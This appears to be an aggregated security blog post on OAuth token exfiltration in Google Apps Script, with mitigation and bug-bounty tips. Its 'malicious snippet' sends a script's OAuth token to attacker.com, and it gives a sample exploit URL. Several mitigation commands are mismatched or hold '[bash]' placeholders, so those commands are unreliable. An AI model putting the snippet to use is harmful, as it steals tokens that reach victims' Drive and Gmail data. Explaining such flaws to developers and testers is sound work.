-Click OAuth Token Hijacking on Google Apps Script – A Design Flaw Ignored? | Bug Bounty

By /

Listen to this Post

While reviewing how Google Apps Script handles authorization, I stumbled upon a significant yet subtle security gap — OAuth tokens can be exfiltrated and abused silently within the same script project.

The core issue revolves around the ability to exfiltrate OAuth tokens within the scope of Google Apps Script Web Apps. This vulnerability allows attackers to retrieve sensitive OAuth tokens when they have access to the project, which can then be leveraged to access and manipulate critical Google services.

Although Google Apps Script cannot be used to full takeover user accounts, the exfiltration of OAuth tokens with broad scopes (such as Google Drive or Gmail) can result in severe security consequences.

📍 Writeup: https://lnkd.in/gs_AFzHn

You Should Know:

How OAuth Token Hijacking Works in Google Apps Script

1. Token Exfiltration via Malicious Script:

  • An attacker with edit access to a Google Apps Script project can inject malicious code to steal OAuth tokens.
  • Example malicious snippet:
    function stealOAuthToken() { 
const token = ScriptApp.getOAuthToken(); 
UrlFetchApp.fetch("https://attacker.com/exfil?token=" + token); 
}

2. Exploiting Web Apps:

  • If the script is deployed as a Web App, an attacker can trigger token theft via crafted requests.
  • Example exploit URL:
    https://script.google.com/macros/s/{SCRIPT_ID}/exec?cmd=steal

3. Abusing Broad Scopes:

  • Tokens with `https://www.googleapis.com/auth/drive` or `https://mail.google.com/` can lead to data theft.

Mitigation Steps for Developers

1. Restrict Script Access:

  • Use `”Execute as me”` cautiously and limit script sharing.
  • Command to check active OAuth scopes:
    gcloud auth list

2. Audit Script Permissions:

  • Review Google Apps Script projects for unauthorized edits.
  • Use `clasp` (Google Apps Script CLI) to audit scripts:
    clasp pull --scriptId [bash]

3. Monitor Token Usage:

  • Check Google Cloud Logs for suspicious token usage:
    gcloud logging read "protoPayload.authenticationInfo.principalEmail=[bash]"

For Bug Bounty Hunters

1. Test for Token Leakage:

  • Look for scripts using `ScriptApp.getOAuthToken()` without validation.
  • Use Burp Suite to intercept token transmissions.

2. Automate Detection:

  • Python script to detect exposed tokens:
    import requests 
response = requests.get("https://script.google.com/macros/s/{SCRIPT_ID}/exec") 
if "access_token" in response.text: 
print("Token leaked!")

What Undercode Say

OAuth token hijacking in Google Apps Script highlights the risks of improper authorization handling. Developers must enforce strict access controls, audit scripts regularly, and monitor token usage. Bug hunters should focus on scripts with broad scopes and test for unintended token exposure.

Expected Output:

  • A secure Google Apps Script deployment with restricted OAuth scopes.
  • Detection of token leakage via automated scanning.
  • Improved awareness of OAuth security flaws in cloud-based scripts.

🔗 Reference: https://lnkd.in/gs_AFzHn

References:

Reported By: Phhitachi Googlevrp – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: